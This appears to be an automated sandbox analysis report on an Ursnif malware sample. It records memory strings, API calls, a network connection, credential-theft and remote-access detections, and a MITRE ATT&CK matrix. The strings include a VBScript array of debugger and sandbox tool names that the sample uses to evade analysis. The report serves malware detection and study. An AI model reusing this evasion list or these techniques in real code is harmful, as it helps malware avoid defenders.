Source: wscript.exe, 00000000.00000002.842192124.00000215903B7000.00000004.00000001.sdmp | Binary or memory string: SINAI = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACER.EXE","NSVERCTL.EXE","SBIECTRL.EXE","ANGAR2.EXE","GOATCASPER.EXE","OLLYDBG.EXE","SBIESVC.EXE","APIMONITOR.EXE","GOATCLIENTAPP.EXE","PEID.EXE","SCANHOST.EXE","APISPY.EXE","HIEW32.EXE","PERL.EXE","SCKTOOL.EXE","APISPY32.EXE","HOOKANAAPP.EXE","PETOOLS.EXE","SDCLT.EXE","ASURA.EXE","HOOKEXPLORER.EXE","PEXPLORER.EXE","SFTDCC.EXE","AUTOREPGUI.EXE","HTTPLOG.EXE","PING.EXE","SHUTDOWNMON.EXE","AUTORUNS.EXE","ICESWORD.EXE","PR0C3XP.EXE","SNIFFHIT.EXE","AUTORUNSC.EXE","ICLICKER-RELEASE.EXE",".EXE","PRINCE.EXE","SNOOP.EXE","AUTOSCREENSHOTTER.EXE","IDAG.EXE","PROCANALYZER.EXE","SPKRMON.EXE","AVCTESTSUITE.EXE","IDAG64.EXE","PROCESSHACKER.EXE","SYSANALYZER.EXE","AVZ.EXE","IDAQ.EXE","PROCESSMEMDUMP.EXE","SYSER.EXE","BEHAVIORDUMPER.EXE","IMMUNITYDEBUGGER.EXE","PROCEXP.EX
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXE@T
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: IDAG.EXET@:V
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE@B
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXEX
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.770714232.00000215922DC000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXE@K
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.770751256.00000215904CC000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXEX
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation
            Source: C:\Windows\System32\wscript.exe TID: 5660 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B9673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 3_2_007B9673
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000003.804520999.0000021593B79000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.865152129.0000021596B60000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 3_2_10002123
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10035BD0 mov eax, dword ptr fs:[00000030h] 3_2_10035BD0
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10035B06 mov eax, dword ptr fs:[00000030h] 3_2_10035B06
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10035710 push dword ptr fs:[00000030h] 3_2_10035710
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10001EE4 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, 3_2_10001EE4

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: pristine.diff.0.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1186882081.0000000001440000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1188285405.0000000002E50000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 3_2_100021F5
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B1ACF cpuid 3_2_007B1ACF
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Eskimo.zip VolumeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_10002123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 3_2_10002123
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_007B1ACF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_007B1ACF
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_100010C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_100010C4
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.789958004.00000215922C1000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.1174352151.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174431871.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1173725277.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174400252.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174270791.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174179348.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1174074557.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.1173922925.0000000005238000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5680, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 311 | Winlogon Helper DLL | Process Injection 12 | Software Packing 1 | Credential Dumping | System Time Discovery 1 | Remote File Copy 3 | Data from Local System | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Replication Through Removable Media | Scripting 121 | Port Monitors | Accessibility Features | Scripting 121 | Network Sniffing | Account Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            External Remote Services | Execution through API 1 | Accessibility Features | Path Interception | File Deletion 1 | Input Capture | Security Software Discovery 121 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Drive-by Compromise | Exploitation for Client Execution 1 | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 2 | Credentials in Files | File and Directory Discovery 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 4 | SIM Card Swap | | Premium SMS Toll Fraud
            Exploit Public-Facing Application | Graphical User Interface 1 | Shortcut Modification | File System Permissions Weakness | Masquerading 11 | Account Manipulation | System Information Discovery 46 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 2 | Brute Force | Virtualization/Sandbox Evasion 2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
            Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection 12 | Two-Factor Authentication Interception | Process Discovery 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading 1 | Bash History | System Owner/User Discovery 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | Remote System Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java